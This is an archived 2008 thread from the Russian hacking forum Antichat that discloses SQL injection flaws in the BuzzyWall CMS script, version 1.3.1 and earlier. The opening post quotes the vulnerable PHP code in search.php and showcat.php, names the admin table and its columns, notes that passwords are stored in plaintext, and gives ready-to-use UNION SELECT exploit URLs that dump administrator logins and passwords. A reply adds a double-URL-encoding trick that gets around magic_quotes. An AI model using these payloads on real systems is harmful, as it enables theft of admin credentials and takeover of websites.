Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   BuzzyWall <= 1.3.1 SQL Injection (https://forum.antichat.xyz/showthread.php?t=85757)

~!DoK_tOR!~ 22.09.2008 20:37
BuzzyWall <= 1.3.1 SQL Injection
 
Офф.сайт: www.buzzscripts.com
Стоймость: 40$
Release date: 22.08.2008
Префикс таблиц бд: bw_
Табличка: bw_admin
Клонки: login,password
Алгоритм шифрования: нету его(т.е в открытом виде)
Админка: http://localhost/admin.php

Сценарий search.php

Уязвимый код:

PHP код:
$q "SELECT * FROM bw_main WHERE wp_status = 1 AND wp_title LIKE '%".$_GET['search']."%';";

...

$qry "SELECT * FROM bw_main WHERE wp_status = 1 AND wp_title LIKE '%".$_GET['search']."%' LIMIT $from$max_results;"
Параметр search передаёться, как есть, без какой либо фильтрации. Что даёт нам выполнить произвольный SQL-зпрос.

Необходимо: magic_quotes_gpc = Off

Эксплойт:

Код:
http://localhost/[installdir]/search.php?search=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,login,password),user(),9,10,11,12,13,14,15,16+from+bw_admin/*

Сценарий showcat.php

Уязвимый код:

Код:
$query = mysql_query("SELECT * FROM bw_main WHERE wp_link_cat='".urldecode($_GET['cat'])."' AND wp_status = 1;");
Необходимо: magic_quotes_gpc = Off

Эксплойт:

Код:
http://localhost/[installdir]/showcat.php?cat=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,login,password),user(),9,10,11,12,13,14,15,16+from+bw_admin/*
http://milw0rm.com/exploits/6527 (c) ~!Dok_tOR!~

[Raz0r] 24.09.2008 12:10
Вообще-то во втором случае (showcat.php) magic_quotes_gpc не имеет значения, так как параметр cat перед выполнением запроса попадает в функцию urldecode(), т.е. экранирование кавычки можно обойти, заменив ее на %2527


Время: 22:08